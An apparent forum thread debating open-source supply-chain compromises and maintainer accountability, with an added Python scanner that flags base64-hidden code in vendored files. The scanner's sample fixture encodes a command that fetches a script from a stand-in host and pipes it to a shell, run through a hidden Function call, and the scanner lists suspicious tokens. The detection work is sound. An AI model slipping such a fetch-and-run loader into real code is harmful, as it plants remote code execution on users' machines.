> The threat of being forever tainted is enough to make people more cautious

No it's not. The blame game was very popular in the Eastern Bloc and it resulted in a stagnant society where lots of things went wrong anyway. For instance, Chernobyl.

reply
> What we need is accountability and ties to real-world identity.

Who's gonna enforce that?

> If you're compromised, you're burned forever in the ledger.

Guess we can't use XZ utils anymore cause Lasse Collin got pwned.

Also can't use Chalk, debug, ansi-styles, strip-ansi, supports-color, color-convert and others due to Josh Junon also ending up a victim.

Same with ua-parser-js and Faisal Salman.

Same with event-stream and Dominic Tarr.

Same with the 2018 ESLint hack.

Same with everyone affected by Shai-Hulud.

Hell, at that point some might go out of their way to get people they don't like burned.

At the same time, I think that stopping reliance on package managers that move fast and break things and instead making OS maintainers review every package and include them in distros would make more sense. Of course, that might also be absolutely insane (that's how you get an ecosystem that's from 2 months to 2 years behind the upstream packages) and take 10x more work, but with all of these compromises, I'd probably take that and old packages with security patches, instead of pulling random shit with npm or pip or whatever.

Though having some sort of a ledger of bad actors (instead of people who just fuck up) might also be nice, if a bit impossible to create - because in the current day world that's potentially every person that you don't know and can't validate is actually sending you patches (instead of someone impersonating them), or anyone with motivations that aren't clear to you, especially in the case of various "helpful" Jia Tans.

reply
Accountability is on the people using a billion third-party dependencies; you need to take responsibility for every line of code you use in your project.
reply
If you are really talking about dependencies, I’m not sure you’ve really thought this all the way through. Are you inspecting every line of the Python interpreter and its dependencies before running? Are you reading the compiler that built the Python interpreter?
reply
It's still smart to limit the amount of code (and coders) you have to trust. A large project like Python should be making sure its dependencies are safe before each release. In our own projects we'd probably be better off taking just the code we need from a library, verifying it (at least to the extent of looking for something as suspect as a random block of base64-encoded data) and copying it into our projects directly rather than adding a ton of external dependencies and every last one of the dependencies they pull in and then just hoping that nobody anywhere in that chain gets compromised.
reply
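The "random block of base64" check in the comment above is cheap to automate before vendoring a file. The following is an added example, not code from the thread or from any project named in it: it scans a set of source files for long runs of base64-alphabet characters, skips hex digests (which also match that alphabet), decodes the rest with strict validation and classifies what came out. The length threshold, the list of suspicious tokens and the sample files are my own assumptions, and the sample files are constructed, not real package code.

```python
"""Heuristic scan of vendored source for long base64-looking blobs.

Added example for this thread, not code from any project mentioned in it.
Sample inputs below are constructed; thresholds and token list are assumptions.
"""
import base64
import binascii
import math
import re
from typing import Optional

MIN_RUN = 40  # assumption: shorter runs are usually ids, hashes or padding
B64_RUN = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_RUN)
HEX_ONLY = re.compile(r"^[0-9a-fA-F]+$")  # a sha256 hex digest also matches B64_RUN
SUSPICIOUS = ("eval(", "Function(", "child_process", "exec(", "http://",
              "https://", "process.env", "fromCharCode")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 for compressed/encrypted data, well below that for text."""
    if not data:
        return 0.0
    n = len(data)
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def try_b64decode(token: str) -> Optional[bytes]:
    """Decode with strict alphabet checking; None if the run is not valid base64."""
    padded = token + "=" * (-len(token) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(decoded: bytes) -> str:
    """Rank what a blob decodes to: hidden code first, then packed payloads."""
    text_bytes = sum(1 for b in decoded if 32 <= b < 127 or b in (9, 10, 13))
    if text_bytes / len(decoded) > 0.95:
        text = decoded.decode("ascii", "replace")
        return "code-like" if any(tok in text for tok in SUSPICIOUS) else "text"
    if shannon_entropy(decoded) > 7.0:
        return "high-entropy"  # compressed or encrypted second stage
    return "binary"


def scan_source(files: dict) -> list:
    """files maps path -> file content. Returns findings, most suspicious first."""
    findings = []
    for path, content in files.items():
        for m in B64_RUN.finditer(content):
            token = m.group(0)
            if HEX_ONLY.match(token):
                continue  # hex digest, common in lockfiles and integrity fields
            decoded = try_b64decode(token)
            if not decoded:
                continue
            findings.append({
                "file": path,
                "line": content.count("\n", 0, m.start()) + 1,
                "length": len(token),
                "kind": classify(decoded),
                "preview": decoded[:40],
            })
    order = {"code-like": 0, "high-entropy": 1, "binary": 2, "text": 3}
    findings.sort(key=lambda f: order[f["kind"]])
    return findings


# Constructed sample inputs (not real package code).
_PAYLOAD_JS = b'require("child_process").exec("curl https://example.invalid/x | sh")'
_PACKED = bytes(range(256)) * 2  # stands in for a compressed/encrypted blob
SAMPLE_FILES = {
    "lib/clean.js": (
        "// plain helper, plus a sha256 digest that also matches the base64 alphabet\n"
        "const digest = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855';\n"
        "module.exports = (s) => s.trim();\n"
    ),
    "lib/sketchy.js": (
        "const k = '" + base64.b64encode(_PAYLOAD_JS).decode() + "';\n"
        "new Function(Buffer.from(k, 'base64').toString())();\n"
    ),
    "lib/blob.js": "const blob = '" + base64.b64encode(_PACKED).decode() + "';\n",
}

if __name__ == "__main__":
    for f in scan_source(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']} {f['kind']:12} {f['length']} chars -> {f['preview']!r}")
```

Run against a real vendored tree by building the `files` dict from `Path.rglob`; the hex skip matters because lockfiles and SRI hashes otherwise drown the report, and the "text" class catches legitimate embedded licenses or fixtures so they sort to the bottom rather than being silently dropped.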
> real-world identity

This bit sounds like dystopian governance, antithetical to most open source philosophies.

reply
Would you drive on bridges or ride in elevators "inspected" by anons? Why are our standards for digital infrastructure and software "engineering" so low?

I don't blame the anons but the people blindly pulling in anon dependencies. The anons don't owe us anything.

reply
A business or government can (should) separately package, review, and audit code without involving upstream developers or maintainers at all.
reply
This option is available already in the form of closed-source proprietary software.

If someone wants a package manager where all projects mandate verifiable ID that's fine, but I don't see that getting many contributors. And I also don't see that stopping people using fraudulent IDs.

reply
Do you know who inspected a bridge before you drive over it?
reply
There is no need for that bullshit. Guix can just set up an isolated container in seconds, not touching your $HOME at all, and importing all the Python/NPM/whatever dependencies on the spot.
reply